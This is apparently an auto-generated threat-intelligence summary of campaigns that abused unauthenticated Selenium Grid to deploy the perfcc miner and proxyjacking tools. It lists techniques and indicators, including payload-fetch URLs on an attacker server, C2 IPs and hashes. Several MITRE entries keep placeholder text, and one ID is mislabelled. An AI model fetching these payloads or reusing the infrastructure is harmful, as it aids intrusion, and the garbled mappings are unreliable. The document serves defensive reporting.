Cado Security identified two campaigns abusing misconfigured, unauthenticated Selenium Grid instances to deploy a cryptominer called perfcc and to hijack proxies for proxyjacking. The campaigns use base64-encoded Python and Bash payloads delivered through Selenium WebDriver configurations, establish persistence via cron jobs, and communicate with a Tor-based infrastructure using a Domain Generation Algorithm for C2. #perfcc #SeleniumGrid
Keypoints
- Cado Security detected two campaigns targeting Selenium Grid to deploy perfcc and proxyjacking tools.
- The attacks exploit default, unauthenticated Selenium Grid configurations.
- Malicious scripts are delivered via WebDriver configurations and executed as part of the compromise.
- The campaigns fetch additional payloads (including reverse shells and proxy components) from remote servers.
- Persistence is established through cron jobs and staged file deployments in /tmp and user directories.
- Involvement of proxy services (IPRoyal Pawns) and traffic tools (Traffmonetizer, WatchTower) to monetize compromised machines.
- The campaigns reveal a broader pattern of misconfigurations being abused across services beyond Selenium Grid (e.g., GitHub/GitLab cases).
MITRE Techniques
- [T1496] Resource Hijacking – Brief description of how it was used. Quote: ‘Threat actors hijack system resources for cryptomining.’
- [T1005] Ingress Tool Transfer – Brief description of how it was used. Quote: ‘Malicious scripts are transferred to the victim’s system.’
- [T1059.006] Command and Scripting Interpreter: Python – Brief description of how it was used. Quote: ‘Python scripts are used to execute malicious commands.’
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Brief description of how it was used. Quote: ‘Shell commands are executed to perform malicious activities.’
- [T1053.003] Scheduled Task: Cron – Brief description of how it was used. Quote: ‘Cron jobs are set up for persistence of malicious binaries.’
- [T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking – Brief description of how it was used. Quote: ‘Malicious binaries are injected into legitimate processes.’
- [T1140] Deobfuscate/Decode Files or Information – Brief description of how it was used. Quote: ‘Base64 encoded scripts are decoded for execution.’
- [T1070.003] Indicator Removal: Clear Command History – Brief description of how it was used. Quote: ‘Threat actors disable command history to avoid detection.’
- [T1070.004] Indicator Removal: File Deletion – Brief description of how it was used. Quote: ‘Temporary files are deleted to remove traces of the attack.’
- [T1027.002] Software Packing – Brief description of how it was used. Quote: ‘Malicious binaries are packed to evade detection.’
- [T1568.002] Domain Generation Algorithm – Brief description of how it was used. Quote: ‘Dynamic domains are generated for command and control communications.’
Indicators of Compromise
- [IP Address] C2/download infrastructure – 54.187.140.5, 173.212.220.247, 193.168.143.199, 198.211.126.180
- [Domain] Malicious domains used for hosting payloads – www.os7mj54hx4pwvwobohhh6.com, www.xt3tiue7xxeahd5lbz.com, and 2 more items
- [URL] Payload fetch endpoints – http://173.212.220.247/burjdubai/.jblae/y, http://173.212.220.247/burjdubai/.jblae/pl, and 1 more item
- [Tor Node] Anonymized C2/Tor traversal – 95.216.88.55, 146.70.120.58, 50.7.74.173
- [File Hash] Packed/operational binaries – 31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da, 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13, and 3 more hashes
- [File Hash] Other binaries associated with deployment – 44e83f84a5d5219e2f7c3cf1e4f02489cae81361227f46946abe4b8d8245b879, 95aa55faacc54532fdf4421d0c29ab62e082a60896d9fddc9821162c16811144, and 1 more hash
- [File Name] Dropped payloads and scripts – perfcc, top, checklist.php, and other related components